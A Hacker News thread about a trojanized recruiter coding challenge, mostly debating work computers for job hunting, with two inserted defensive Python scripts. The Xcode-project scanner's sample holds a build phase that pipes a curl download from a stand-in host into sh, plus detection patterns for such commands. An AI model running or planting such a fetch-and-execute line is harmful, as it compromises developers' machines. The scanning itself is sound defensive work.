Fake recruiter lured aerospace employee with trojanized coding challenge (welivesecurity.com)
311 points by transpute 12 months ago | 158 comments



Wait, they got in through take-home leetcode tests?

That’s damn clever.

I program Apple software, and Xcode projects can dig deep. Apple gives you a warning about opening a downloaded project, but you’re almost certain to ignore that, if you think it’s a take-home.

I assume that taking online ones would ask for hairy access, as well.

Also, the people going for these would probably have pretty damn good access to the corporate Crown Jewels.

Of course, no one would use corporate resources for job-hunting, right? I know that folks here, get all huffy, when I suggest that happens rather frequently.


>Of course, no one would use corporate resources for job-hunting, right? I know that folks here, get all huffy, when I suggest that happens rather frequently.

Where I work we have a take home exercise we have candidates do, and then when we have the interview with that person we review their code with them and ask them to make incremental changes to see how they handle the asks with their communication skills and their technical ability. I interviewed one individual who couldn’t even get the REPL started for their project, and as they were struggling trying to get it to work I heard them mumble to themself “I should have just used my work computer”. The fact they couldn’t get the most basic aspect of the project to work on their personal computer meant that they did their coding assignment on their work computer.


Interesting. What makes work provided computers better suited for coding?

Me, I don't recall using company hardware for anything even remotely personal in many years. It's stupid because they are loaded with all kinds of spyware.


When you spend eight hours coding on your work computer, you make lots of little tweaks to improve workflow. If you then do nearly no coding on your home computer, it's unlikely that you will perform the same tweaks. I try to keep my systems set up almost identically, but that's a lot of work. (I now try to use ansible for that but after playing around for a bit I'm having doubts if it was the right choice. Keeping everything in sync is not exactly ergonomic.)

Some particular quirk of autocompletion could become almost pure muscle memory, and if it's suddenly missing, you notice.


It sounds like you'd benefit a lot from Nix/NixOS [1], if not just home-manager[2].

1. https://nixos.org/

2. https://github.com/nix-community/home-manager


Work computer is Windows with WSL, home computer is Ubuntu. On the work computer I need to develop in IntelliJ and VS Code. At home I can use Copilot or local LLMs; at work I cannot (nor several other useful extensions). At work I use Maven and I have to spend 15 minutes dinking with project settings any time I need to compile a new project. At home I have admin privs; at work it’s a set of hoops to get temporary admin access, so I forgo things like system environment variables.

I am skeptical that Nix or home-manager would solve these problems. So I just have a specific setup at work that is typically more advanced and automated than my home system. My leet code interviews suffer because of this. It just makes me realize that coding interviews using an environment that does not mimic the workplace are just excluding senior developers (read: old people) who don’t have the time or patience to jump through these hoops for 15 minutes of placating a recently hired college grad.


Nix evangelists should seriously consider putting the brakes on advertising Nix until its horrible UX is fixed. I’m struggling to even discuss Nix as an option at work because every engineer I bring it up to has had bad first impressions.


Anecdotal comment: Check out Chezmoi. It's worked really well for me.


Thanks, I never heard of it before and it looks really interesting.

However, it seems that it does not cover all of my needs: https://github.com/twpayne/chezmoi/discussions/1510#discussi...

Maybe I should use Ansible for system-wide configuration and chezmoi for dotfiles in $HOME.


I read that as the literal letters for like 10 seconds before realising it was French for 'at home'. Made me laugh.


When you get a work computer you have to get it set up to do your work immediately. The work you are doing is probably the work you will be interviewing for, thus you have everything you need for the coding challenge already set up on your work computer.

When you get a personal computer you do not need to set up all the things you need to do your work immediately, so you will do the setup of things as you need them.

Thus if you get a new personal computer it might not be fully set up yet.

If you are of the age that you have kids you may not have time to do any sorts of personal projects, if so and you have an old personal computer it may not be up to date with what is needed for the coding project because you have not been doing a lot of stuff.

If you have kids or other problems your personal computer may end up broken or unusable and you might not have the money at the moment or the reason to buy a new one.


I mean the first one is probably not right either, since often you need to do some particular thing or use some library you are unfamiliar with but it is at least more right than on your personal computer for the other reasons listed.


> Interesting. What makes work provided computers better suited for coding?

They already have working software development environments. It's a process that can be time-consuming and is done once in a blue moon (basically when you need to reimage the machine). In the meantime, all changes to your software dev environment are gradual, and your work-provided computer ends up being configured like a software development pet instead of cattle.

Moreso if your company adopted/enforces internal development tools.

Ask yourself this: how many times have you gone through a complete OS reinstall and subsequently had to set up a working software dev environment? Is this something you have automated? Most people do not.


I've been in almost exactly this situation, although the issue was rather that I have a Linux tower without camera/microphone and a Windows laptop for playing some games or doing Microsoft / office stuff. Setting it up to anything resembling my real dev experience is probably a day or two of work, and the first time I used it for a job interview I probably seemed less than competent... I also have a work MacBook, but so far haven't used it for applying to other jobs, that would be kinda weird.


I have met people who can’t really code outside an IDE. If someone has a full JetBrains setup at work, and never worked any other way, it might be really hard for them to change code on demand without it.

I expect there is a similar, but worse, problem growing with CoPilot and friends.


Just that it's set up in a particular way, I suspect. A long running project/organization will accrete plenty of tools, scripts, configurations, etc that make their environment different than another using a similar stack.


For a few roles I’ve been allowed to buy a top of the range MacBook and expense it without any contact with IT - no spyware, no anything. To that end, I never felt the need to buy a personal laptop and do basically everything on my work laptop


If your company ever has to go through litigation, all of your personal data will be at risk during discovery. Always keep work and personal separate. This includes mobile phones.


I don’t even use the same OS at work. I use macOS at home, but work at a Windows shop on a Dell.

I guess this is because in college and in my first few dev jobs I used Macs. A nice side effect is my wife hasn’t had any tech support complaints since we switched; it has been great.

I’d still never use company hardware for personal stuff. I don’t even login to Spotify on the company laptop.


That's weird, why did she stop asking you for help? I'm on Windows and my wife is on macOS and she still hits me up for tech support problems.


Could you give a few examples of _tech support problems_ she had with macOS that were escalated to you?


Okay to be fair she was on Ubuntu.

She doesn’t seem to have issues with macOS at all though, aside from the one time I had her using a VPN and it expired which is totally on me and disabling it was nonobvious.


If you don't really code in your spare time your home computer might be unsuitable. For example a Chromebook


> Interesting. What makes work provided computers better suited for coding?

Some people only know how to code within the environment managed by their corporation. This is increasingly the case with folks that have only worked at Kubernetes shops.


[flagged]


> Why did you feel the need to quote the parent comment? Especially for just a short statement

Because of decades of experience in online forums?

Newcomers don't realise that the parent posts can be deleted or edited or flagged to death.


And yours can't?


> And yours can't?

You miss the point: even if you now go back and delete your post, readers still know what I am responding to.

It's also why I said that newcomers to online discussions don't realise this, because you didn't realise this.


> I interviewed one individual who couldn’t even get the REPL started for their project and as they were struggling trying to get it to work I heard them mumble to themself “I should have just use my work computer”. The fact they couldn’t get the most basic aspect of the project to work on their personal meant that they did their coding assignment on their work computer

I've been a candidate who "couldn't even get the most basic aspect of the project to work".

I had been working for years at a company that most developers in the world would sacrifice their firstborn to have a shot at being hired by, and I'd been using their work laptop for years on end. I considered switching gigs, I answered a recruiter's call, and I found myself in a technical interview using one of my own laptops. Only during the interview did it dawn on me that my personal laptop had no development tools installed. Why? Because I never used it for work. Worse, I was used to my employer's automated process to set up software development environments, so I had no assurance that I could set up a fully working dev environment in 5 or 10 minutes, let alone the meeting's full hour. If you want to run Python as a REPL on Windows, good luck.

Thankfully my meeting ended up using a webapp to do the pair programming/coding challenge, but if I had to run code on my personal computer I would have to spend far more time setting it up than testing stuff, reschedule the meeting, or simply bail out.

Some companies allocate more than a day to get new candidates to set up a working dev environment and building a project, while assigning an experienced dev to guide them. I know that because I've onboarded half a dozen people and that's what it usually takes.

I'm reading your comment and I'm surprised you didn't notice how your account does more to document how oblivious you and your team were to critical failures in your hiring process than to assess the competence of a candidate. How many times per day do you need to set up a software dev environment? Is this how your company gets paid? Is that where you needed additional people to work? No? Then why on earth are you evaluating them in a completely irrelevant domain? Don't you have people in your team who can spare some minutes documenting and automating that process?

By the way, following that interview I was extended an offer for a senior position. If the recruiter was like you and I had been evaluated on my ability to set up a working software dev environment in the allotted time, I'm sure I would have spent over half the meeting googling for where to download the interpreter and how to set it up.


I can select "run Python as a REPL on Windows" in your post, right click, search and find an answer within a minute.

From my experience, onboarding at companies is a painful process due to internal software, specific setups for complex build processes and (frequently) permissions / annoying processes required for downloading and installing things. Those points are not applicable if you are using publicly available and well documented tools on your own machine.


> I can select "run Python as a REPL on Windows" in your post, right click, search and find an answer within a minute.

That takes place only after you search for the Python installer, download it, install it, check the environment flags, and restart your terminal of choice.

The web is jam-packed with examples of how problematic it is to set up and deploy Python on Windows, and we're not even touching the problem of how some fundamental packages, such as anything involving the file system, are either riddled with platform-specific gotchas or do not work at all.

Setting up a REPL is a far more involved process than is being casually described in this thread.


It can be that simple, but there are plenty of times where the easy route doesn’t work. Sure it’s solvable with 5 minutes of googling and applying the top stack overflow solution, but of course the interview is not the time for that. And there are many other aspects that can throw you off and give the unjust appearance of incompetence.


My anecdote was to show that there are in fact people who use their work computer in order to do projects related to their job search. You have made many assumptions based on my small paragraph.

First, this is a coding challenge that the candidate is given before the technical interview; it is well defined in its expectations and small in scope. They are not expected to spend more than an hour or two on it, and they send the recruiter (who is an internal recruiter) a link to their GitHub repo with their completed project before the technical interview is even scheduled. Candidates would have several days and potentially even a week between when they finished the project and when we have the technical interview. The candidates are also told that their project will be gone over in the technical part of the interview. I understand that there are circumstances that would prevent the individual from getting an environment set up on a personal computer, but if that is the case then just stick with using the work computer.

Second, I never even indicated if the individual was hired or not, but you made the assumption that we passed on the candidate. The fact that the candidate couldn't get the REPL started was just a tidbit that stuck out to me, and I made the comment to my coworker as it is odd to me that a candidate would use their work computer for a job search. We just went with the fact we couldn't use a REPL and had the candidate talk out loud about what he would change when we added different scenarios/requirements.

For what it's worth, the candidate was using a Mac for their personal laptop, so all they would have had to do is run the following in their terminal and it would have gotten them pretty close to being able to run the REPL:

brew install clojure/tools/clojure


Generally, where the candidate is required to have a working local environment, companies will tell the candidate that in the prep material.

It’s surprising how often this is ignored.


Jane Street?


At my first IT job, I spotted some bounce messages from a jobs address at a local big pharma firm. Admittedly, personal email addresses weren’t as common in 1996 as they are now, but still, rookie mistake.

I’ve maintained a strict “don’t do anything personal on a corporate computer” policy for a long time, but I’ve not found that to be a common approach.


Same here. Air gap your personal and professional life. Separate devices, separate networks (if you work from home), don’t even bring your personal device to work if you don’t really have to.

There was a story a few years back making the rounds on HN where an Apple employee had to turn in her corporate device due to some lawsuit against the company. This happens all the time in big companies. She was outraged at this because she had personal nudes on her corporate device. WTF how could anyone think this was a good idea?


I don't work for Apple or (honestly) know anyone that does, but from at least one news article, I get the impression Apple openly encourages (and maybe even requires) it.

https://www.theverge.com/22648265/apple-employee-privacy-icl...


> I get the impression Apple openly encourages (and maybe even requires) it.

When I worked at Apple I needed a personal iCloud account to set up my corp MacBook. I simply created a new dummy personal account just for that. Nobody's auditing your iCloud account to make sure it's your "real" personal account or anything.


At my last job I used a dummy iCloud account at the system level, but you can log into a separate account for the app store, which was necessary to avoid having to re-buy some apps I depend on.

Just as I was leaving they were in the process of replacing everyone's computer with new ones that were much more locked down.


Yeah, about that. That's one of the biggest weirdnesses related to MacBooks in a corp environment: why do I need an unrelated account to do basic stuff on an Apple machine?


It all depends on how they manage them. You can and should just make a youremail@company.com iCloud account. I'm actually surprised that's not the norm so they can take over stuff like Activation Lock.

I don't use a personal iCloud account on my work computer... it's not even allowed lol.


I have a “work personal” Google account for Chrome for similar reasons.


[flagged]


> Why did you feel the need to quote the parent comment

No reason in particular.


> I get the impression Apple openly encourages (and maybe even requires) it.

To take nudes?


To store them on a corporate device. Weirdly the requirement originated from the IT department.


Roy Trenneman made that policy and got Jen Barber to unknowingly approve it


Apple encourages it, however, it's not required.

Meta requires you to link your personal meta account with your work identity.


Meta requires you to link a personal account to your work identity. Similar to Apple, they don't check to see if it was created just for the purpose.


Meta also requires in their TOS that you have only one account and that it uses your “real” identity, so you’d be in violation of TOS with your work account.


Meta specifically says during onboarding to not create a work only account.


> There was a story a few years back making the rounds on HN where an Apple employee had to turn in her corporate device due to some lawsuit against the company.

Smarter decision is for the corp to just buy your device for you. Then it's a personal device, and at least in some cases I'm aware of, not a government record at least.

Very doable for a phone where your "work" is limited to messages, webmail and calls.


My advice to young colleagues: never do anything on a work computer that you wouldn’t mind your boss (or her boss) seeing.

Being greeted with a Department of Defense splash screen before login reminding me that everything I did on that computer was subject to monitoring formed that habit early, and I still can’t shake it, no matter how long I work in Germany, for a German firm with a rather assertive works council.


> no one would use corporate resources for job-hunting

Morally grey (pale blue?) aside, I've been given entire days at work to look for new jobs as part of a redundancy agreement; it was widely supported by management.


Apple added sandboxed shell scripts recently, I assume as part of an effort to make builds a little more hermetic. While I’m sure it’s not a perfect solution I feel like it would be nice to open a project in a mode where all build steps run in a sandbox. Obviously when something fails you can take a look at what it was trying to do :)


Whenever I grade take-home assignments, the first thing I do is open the Xcode project file in vim and look for shady stuff. Admittedly, I don’t think most of my colleagues do the same due diligence.
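Added example, not code from the thread or from Apple: a small Python script that does what the comment above describes by hand, namely pulling every run-script build phase out of an Xcode project.pbxproj, unescaping the script text and flagging the usual smells (network fetch piped into a shell, base64 decoding, eval) so a reviewer reads those phases before building. The project excerpt is constructed, the example.invalid hostname is a reserved non-resolving name, and the SUSPICIOUS pattern list is an assumed starting point, not a complete one.

```python
import re
import sys
from typing import List

# Constructed excerpt of an Xcode project.pbxproj file. The "Run Script" phase
# is a made-up illustration of the kind of phase worth reading before you build;
# example.invalid is a reserved, non-resolving hostname.
SAMPLE_PBXPROJ = r'''
// !$*UTF8*$!
{
    objects = {
        AA01 /* Sources */ = {
            isa = PBXSourcesBuildPhase;
            files = (
            );
        };
        AA02 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "echo \"build ${CONFIGURATION}\"\ncurl -s http://example.invalid/setup | sh\n";
        };
        AA03 /* Lint */ = {
            isa = PBXShellScriptBuildPhase;
            shellPath = /bin/sh;
            shellScript = "swiftlint\n";
        };
    };
}
'''

# Heuristic smells (assumed list, not exhaustive); a hit means "read this script", not "malicious".
SUSPICIOUS = {
    "network fetch": re.compile(r"\b(curl|wget)\b"),
    "pipe to shell": re.compile(r"\|\s*(sh|bash|zsh|python3?)\b"),
    "base64 decode": re.compile(r"base64\s+(-d|-D|--decode)\b"),
    "eval": re.compile(r"\beval\b"),
    "osascript": re.compile(r"\bosascript\b"),
}

PHASE_MARK = re.compile(r"isa = PBXShellScriptBuildPhase;")
NAME_RE = re.compile(r"/\*\s*([^*]*?)\s*\*/\s*=\s*\{\s*$")
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";', re.DOTALL)
SHELL_RE = re.compile(r"shellPath = ([^;]+);")


def unescape_pbx(s: str) -> str:
    """Undo the backslash escapes pbxproj uses inside quoted strings."""
    table = {"n": "\n", "t": "\t", '"': '"', "\\": "\\"}
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(table.get(s[i + 1], s[i + 1]))
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def find_script_phases(pbxproj: str) -> List[dict]:
    """Return every run-script phase with its name, interpreter, script text and smell hits."""
    phases = []
    for m in PHASE_MARK.finditer(pbxproj):
        # The object's display name sits just before its "= {" opener.
        head = pbxproj[max(0, m.start() - 200):m.start()]
        name_m = NAME_RE.search(head)
        # This phase's own keys run until the next object's isa line.
        tail = pbxproj[m.end():]
        nxt = re.search(r"\bisa = ", tail)
        block = tail[:nxt.start()] if nxt else tail
        script_m = SCRIPT_RE.search(block)
        shell_m = SHELL_RE.search(block)
        script = unescape_pbx(script_m.group(1)) if script_m else ""
        phases.append({
            "name": name_m.group(1) if name_m else "(unnamed)",
            "shell": shell_m.group(1).strip() if shell_m else "/bin/sh",
            "script": script,
            "flags": [label for label, rx in SUSPICIOUS.items() if rx.search(script)],
        })
    return phases


def main(argv: List[str]) -> None:
    """Usage: python check_pbxproj.py path/to/project.pbxproj (defaults to the sample)."""
    text = open(argv[1], encoding="utf-8").read() if len(argv) > 1 else SAMPLE_PBXPROJ
    for p in find_script_phases(text):
        status = "CHECK: " + ", ".join(p["flags"]) if p["flags"] else "ok"
        print(f"[{status}] {p['name']} ({p['shell']})")
        for line in p["script"].splitlines():
            print("    " + line)


if __name__ == "__main__":
    main(sys.argv)
```

Run it against `MyApp.xcodeproj/project.pbxproj` before opening the project; the script only reads the file, so it is safe to run on an untrusted submission, and anything it flags is exactly what the sandboxed-build-phase idea two comments up would have contained.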


Personally I gave up having my own computer about 10 years ago. Probably not the “safest” strategy, but I always found it a bit wasteful to buy a second device.


I have worked in companies where that would be a reason to terminate the contract.


Seems like a silly, unnecessary risk but it seems like more and more people don’t even have their own laptop.


In many companies, using work laptops for private stuff is considered a security issue and a breach of the work contract. Not everyone actively checks it; it is, however, an easy way to fire someone when something like this happens.


We had someone submit their current employer's code as a solution to the assignment. It had the company’s name all over in namespaces, etc. It was also not what we asked for, but something only slightly related. Their employer was making medical devices.


Download an .exe, but via an appeal to greed and flattery, and the implied trust of a FAANG.

The solution might be to do real work in VMs while the laptop is a dumb terminal then lock it the fuck down (no downloads!)


The attackers didn't even use a trojan project/source. They just sent a malicious .exe (wrapped in an .iso file) and asked the victim to run it and write a C++ program that produces the same output.


Everything corporate devices touch, they own, so if you hunt for a job on company property you become a consultant in your next job, leased out by your current one.


Corporate laptop for personal use, no, but corporate monitors and dock, yes.


I’m always surprised people do take home tests, email headhunters, call and interview with other companies on their current company’s hardware. Plenty told me they do it, but I just can’t comprehend it.

There are so many potential consequences. An eager beaver manager once talked a future employer out of employing me through a personal connection, and that was just because they found out. Even if it was unethical or illegal, these things happen, and even in large tech companies. Imagine willingly sharing all details of your job hunts with your employer… maybe it’s just me, but the thought feels wrong.

Work and personal matters should be church and state, right?


I find it pretty disturbing how many of my coworkers don't even have a personal computer -- they just use their work laptop for everything. Mind-boggling. (These are software developers, they can damn well afford a laptop.)

The most I mix it is using my smaller, lighter, Bluetooth-supporting work laptop for watching innocuous YouTube videos while doing dishes. And I used to use it to print stuff at the office, on occasion.


Yeah, it's a good way to get your personal things brought in to discovery, snooped on by corporate security, or erased when you suddenly get laid off.


Yeah, I’m always surprised why anyone would risk having their personal email/life dragged into a corporate dispute because they are emailing stuff between their work and personal accounts etc.


There are 2 types of people. No, not actually, there is a continuum of the feeling of 'just getting by'/low motivation. Many people exist on the side of low motivation and those on the other side don't understand them.


> These are software developers, they can damn well afford a laptop.

Not necessarily. On the one level, you don't know their salaries (as they might have negotiated badly or simply be underpaid), and then additionally they might pay a lot for housing, child support, debt, medicine, or other invisible expenses. Living in a place like San Francisco it can quickly add up.


"Not necessarily", yes, but I know these particular people.


> they can damn well afford a laptop.

My back can't afford it.

A MacBook Pro is already heavy enough that you can feel if it's in a large suitcase. 2 would be ridiculous.

I do have a separate partition for personal. Maybe I should upgrade that to an external drive, but that sounds inconvenient.

If Apple is listening, please make a carbon fiber MBP.


I don't generally bring my personal laptop with me to work, and I don't generally bring my work laptop with me on vacation...


It's not surprising to me at all; there's very little friction to continuing to use the thing you use every day for a new task.

I completely agree with you, it has a high risk associated with it, and you really shouldn't do it, but I can see how it happens when people don't think things through or don't remain vigilant.


Just as a matter of CYA, use a phone/tablet for interviews if you must. Why add the unnecessary risk?

Maybe people like the rush…


Development is one of the worst cases for a tablet though. Almost any other task works better.


So they sent .exe files to the victim, under the pretext that the victim was supposed to duplicate their functionality in C++? Receiving an .exe file from someone should be a dead giveaway that this is an attack, or at least, that the person sending it to you is incredibly technically incompetent. But then again, I lived through the Windows 95 era. I suppose some lessons have to be re-learned with every new generation.


You only need to succeed once against a company full of people if your job offer is enticing enough. We don't know how many people said "never mind" when asked to do weird tests.

The stupid thing is that it's remarkably easy to sandbox an application these days. Sandboxie is free, though not guaranteed to work (but it may very well have done, or at least would have made the strange behaviour obvious), and Windows Pro has had a right-click menu option to run an executable in a sandbox for a while.

When I read the title, I initially thought it was about infection through IDE ("do you trust the authors of this project" is there for a very good reason and in the case of VS Code attackers can get code execution before the prompt through Git config trickery).

I'd be wary of executing a program, but I bet I would click the "sure enable code execution" button if a recruiter sent me a coding challenge in the form of an incomplete project with a Git repo. Especially if they could set up a remote interview process where they want to go through code live "to see how I approach problems".

Right now the attack is super basic, but it's not hard to make the initial infection harder to detect in time.


At first I thought this was more clever than it was. Talking people into running downloaded or attached exe files is simple and apparently still effective.

But what would be even more wicked, and effective would be pointing them to a GitHub repo with the “challenge” project to complete, and referencing a compromised package that does their bidding as the victim tests their solution.


Yeah I was thinking about that. Even asking me to use a specific package for any reason, I probably wouldn't think much of that before today. However now I'd certainly question it.


Knowing what they were trying to do actually makes me wish I were the one they were trying to trick. I know these aren't regular lame script kiddies, but I wonder how they'd react to an attempted counter-offensive.

Give me an .exe and ask me to run it, and I'll open it in a hex editor for inspection instead. If what you claim is a "hello world" or Fibonacci generator is much bigger than I'd expect (a few KBs) and contains encrypted-looking data or other attempts at obfuscation, I'm not running it.
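Added example, not code from the thread or from the article: the comment above proposes two pre-execution checks, "is the file far bigger than a hello-world should be" and "does it contain encrypted-looking data", and this Python script makes both mechanical by computing Shannon entropy over fixed windows of the file. The size ceiling, entropy threshold and window size are assumed policy values; the two sample byte strings are constructed (repetitive text, and a perfectly uniform byte pattern standing in for a packed or encrypted payload), so the script runs offline without any real binary.

```python
import math
import sys
from collections import Counter
from typing import List, Tuple

# Assumed policy values, not figures from the thread: a toy "print some numbers"
# program should be tiny, and code or text rarely exceeds ~6.5 bits per byte,
# while packed or encrypted payloads sit close to 8.
EXPECTED_MAX_SIZE = 64 * 1024
HIGH_ENTROPY = 7.2
WINDOW = 256


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant run, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def windowed_entropy(data: bytes, window: int = WINDOW) -> List[Tuple[int, float]]:
    """(offset, entropy) for each fixed-size window; a sharp jump marks an embedded blob."""
    return [(off, shannon_entropy(data[off:off + window]))
            for off in range(0, len(data), window)]


def triage(data: bytes, expected_max_size: int = EXPECTED_MAX_SIZE,
           high_entropy: float = HIGH_ENTROPY) -> dict:
    """Cheap pre-execution check: flag files that are oddly large or hold high-entropy regions."""
    windows = windowed_entropy(data)
    hot = [off for off, e in windows if e >= high_entropy]
    reasons = []
    if len(data) > expected_max_size:
        reasons.append(f"size {len(data)} bytes exceeds expected {expected_max_size}")
    if hot:
        reasons.append(f"{len(hot)} of {len(windows)} windows at or above "
                       f"{high_entropy} bits/byte (packed or encrypted data?)")
    return {
        "size": len(data),
        "overall_entropy": round(shannon_entropy(data), 2),
        "high_entropy_windows": hot,
        "reasons": reasons,
        "suspicious": bool(reasons),
    }


# Constructed stand-ins: repetitive text (low entropy) and a uniform byte pattern
# standing in for an encrypted/packed payload (entropy exactly 8.0 per window).
PLAIN_SAMPLE = b"Hello, world!\n" * 100
PACKED_SAMPLE = bytes(range(256)) * 512


if __name__ == "__main__":
    # Usage: python triage.py suspicious.exe (defaults to the constructed packed sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = PACKED_SAMPLE
    report = triage(data)
    print(f"size={report['size']} entropy={report['overall_entropy']} "
          f"suspicious={report['suspicious']}")
    for reason in report["reasons"]:
        print("  -", reason)
    for off, e in windowed_entropy(data)[:8]:
        print(f"  offset {off:#08x}: {e:.2f} bits/byte")
```

Compiler-generated code and resource sections sit well below the threshold, so a legitimate Fibonacci program yields a handful of windows in the 5 to 6.5 range; a block of consecutive windows pinned near 8.0 is the "encrypted-looking data" the comment describes and is reason enough to hand the file to a sandbox or an analyst rather than double-click it. The verdict is a triage signal, not a malware determination.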


Or at least run it in a VM


I’ve suggested binary distribution as part of a black box exercise in the past. Locking down the source and being able to change details for each candidate would mean solutions posted online would not help.


Because cameras don't exist, right?

Unless you're crafting some revolutionary problem for each candidate, changing details won't matter much.


Any particular reason you’re being so combative about this?

I’m talking about a take home code challenge. It’s unreasonable to have someone record a video that could last an hour or more. And I’m not gonna sit and watch that.


I doubt it was .exe, probably .msi (installer) or zip file.


When I was consulting on some government programs, I consciously kept my resume off the Internet.

I didn't have access to anything useful to spies, but some of the keywords might look to someone like I did. Like how some recruiters seem to spam all keyword search hits on LinkedIn.

I knew I'd have to report any kind of security incident, and I thought that might interrupt my contracts and income, while a cautious bureaucracy processes the incident. So, no resume online. Also, measures to try to prevent a random burglar from inadvertently stealing the work laptop.

(Now that I'm away from that work, I get to enjoy LinkedIn recruiter spams for Junior Python Leetcode Hazing Engineer roles, like everyone else.)


Don’t know why you’re getting downvoted. I’d imagine that not publicising your employment status is a run of the mill security measure for specific roles and industries that are subjects of targeted attacks.

As a meatspace equivalent I’m sure there are not many CIA operatives walking around foreign countries and giving out CIA-stamped business cards.


Off-topic: Given that state cyber entities maintain networks isolated from the internet, how do they adapt to the rise of tools like Co-Pilot and ChatGPT in the software engineering landscape? This kind of security setup inherently restricts access to such tools, potentially slowing their pace. Thoughts?


Don't use them, duh. Pay enough money to get a copy on premises if it ever gets useful enough for that. In the time they'll get around to changing their procedures, models will get small enough that it will be a non-issue.

Disclaimer: layman's opinion, I only know what internet knows.


I work at a large SF based SaaS, there's so much money in that space the company spun up a team to build an air gapped version of our product for restricted networks.

It's definitely much slower than the private sector, but if the agencies decide they have a use case, they'll throw money at it until it works in house.


I think that's an over-reaction. I am in a similar situation (I don't want certain people to know where I work), but I am OK with keeping the old CV, which doesn't mention the place where I work now, still online.

I have also asked the head of HR to make absolutely sure that my name is not on their public "our team" page. As a side effect, I always giggle during the mandatory corporate security training that tells how to deal with targeted attacks and demonstrates example phishing emails - so far, I received zero, if we don't count tests by a pentest agency.


Yeah, today, if I needed to keep a lower profile about a role, I'd still want to be on LinkedIn (if only to be reachable by contacts, now that the Web is so centralized), so I'd do something like that.


What kind of imbecile does personal stuff in a company device? We are not talking about poor people, we are talking about people who have money enough to have their own personal devices.


I use my company laptop for personal things all the time. My personal computer is some kind of space heater that can also run video games, so I don’t use it by default. I can afford a third device but I have better things to do with the money.

Of course I aim to respect the security rules of my company. I trust my company. I wouldn’t enjoy working for a company that I wouldn’t trust with my browser cookies.

The laws are also on my side in my jurisdiction. I cannot be fired simply because I did something my company didn’t enjoy on the company laptop. They need a really good reason.


> I cannot be fired simply because I did something my company didn’t enjoy on the company laptop. They need a really good reason.

Getting fired is not the risk you are running, getting all your personal data exposed by any civil suit the company gets hit with is the risk.

Exposure is the risk, not firing.


I see. It sounds very unlikely and I’m fine with the personal data I have on my company computer being exposed within the context of an investigation and a trial. I guess it may be more scary in some countries.


> It sounds very unlikely and I’m fine with the personal data I have on my company computer being exposed within the context of an investigation and a trial.

Okay, let's talk about something more likely: your communications are not private - when you connect to an https URL you expect that your password is never in the clear.

With most organisations I have worked with/for, they almost always perform MitM on all TLS connections, and it works seamlessly (i.e. without you knowing) because their certificate is on the machine.

Only the very small and/or very poorly-run organisations aren't doing this, because unless they do the MitM, the network tools they use to detect malicious activity on their network cannot do Deep Packet Inspection (tools such as Darktrace).

It's exceedingly unlikely that the password you used to log into your bank account from your work computer is indecipherable to your network operators. It may as well be in the clear within the network.


My roommate used his work laptop as his personal laptop for 2 years simply because he didn’t wanna shell out for a personal laptop.

When I was an intern in college and was much poorer, I also was guilty of the same…


I do personal things on company hardware, just nothing actually personal. No sign-ins, but I'll watch a movie on work laptop happily.


How do you watch the movie, though? If you do it legally, you need to use an account, and that's personal, no?

Unless you watch free movies on YT or torrent stuff, of course


It blows my mind away that this remark is entirely oblivious to the consideration of physical media.


Physical media is a relic. Most laptops don't come with a drive and most company policies will try to block USB drives of any kind.


> ...most company policies will try to block USB drives of any kind.

Grand assertion. Where's your supporting cite? To be clear, before goalposts are moved, the context is external optical media drives---a peripheral commonly issued alongside laptops without one---not USB mass storage devices.


> a peripheral commonly issued alongside laptops without one

Wait, _is_ it? In this future year of 2023? I haven’t seen this as common practice for at least a decade.

(The sort of higher-security-stance companies who disable USB drive support will also generally disable support for external optical drives, because why take the risk?)


The same imbecile that would run Quiz1.exe they received from a random person on the Internet.


Someone who needs to. In this case, the victim worked for an aerospace company. I know some people in that industry and all of them work insanely long hours. On top of that, it was a Spanish company, so working for 10+ hours a day would be expected.


They could cut that time down if they skipped taking a siesta, right?


If their boss wants to meet with them at 8PM, skipping their siesta won't help. Spanish corporate types hang out at the office until their dinner time, which is also horribly late.


Google, Apple, and Microsoft all presumably encourage their employees to actually use their software before it goes out to the public to make sure it actually works. Google doesn't want to find out that some changes to Android cause major apps to crash, so they encourage their employees to use work devices as their personal devices in order to get better coverage.


Not exactly the same thing, but the highest paid position I have ever had so far in my career was one that expected me to use my personal device for company work. There are many well known employers that take IT security seriously, and many that don't.


Slight tangent: How can Lazarus/HIDDEN COBRA be such a sophisticated nation state actor when North Koreans can barely access the internet until becoming government employees?

One would think that being unable to access modern security research, open source projects, programming resources, or "wild" malware would not exactly raise a nation of brilliant hackers. Perhaps some who subvert the great firewall are vanned and offered a job in the unit?


>being unable to access modern security research, open source projects, programming resources, or "wild" malware

how do you know they are unable to obtain such things?

also, how do you think hackers are trained? by teaching them how to create a ToDo app with the nightly build of React?

they probably know by heart the ethernet and TCP/IP stack better than the guys who created them and could recite it backwards, and that's already enough to hack plenty of things


> also, how do you think hackers are trained?

I don't know, but I thought they started as "script kiddies" at about age 12 before growing into full size hackers.

Which requires that tech be available widely enough that 12 year old kids can get unsupervised access to it.


I think (based on my limited research) it's either a loose affiliation (mainly based in China or Russia), or the children of party elites who likely have more privileges and access than the average North Korean.


That isn't mandatory. It's all stuff you can be taught later.


The story I may have heard from a talk by a Dutch cyber security organisation is that they train their hackers inside the country and then ship them off (under heavy oversight, of course) to China, where they'll operate from internet cafes.


Maybe they have a "gifted children" training program, where they give technically talented 7yo access to everything and grow them into hackers.


They recruit the best from school early on and their training is intense. It's a very desirable job in a country that has food, electricity and other shortages.

Have a listen to the Lazarus Heist podcast for more information.


they arguably operate from china


Unsurprising, of the 300 staffing agencies in our area only 23 are actually licensed to legally operate as a service. Trying to authenticate which are "fake" or "real" is a thread most companies/applicants would rather not pull.

There is also the fake-hire scam: where staff are lured away with lucrative compensation packages, data-mined by the competitor, and finally jettisoned before the evaluation period expires (typically 6 to 10 months).

A few infected PDFs from various bad actors are also floating around out there with exaggerated promises.

Keep safe, and note 86Box supports read-only backing images and sessions like Bochs/KVM:

https://github.com/86Box/86Box/releases

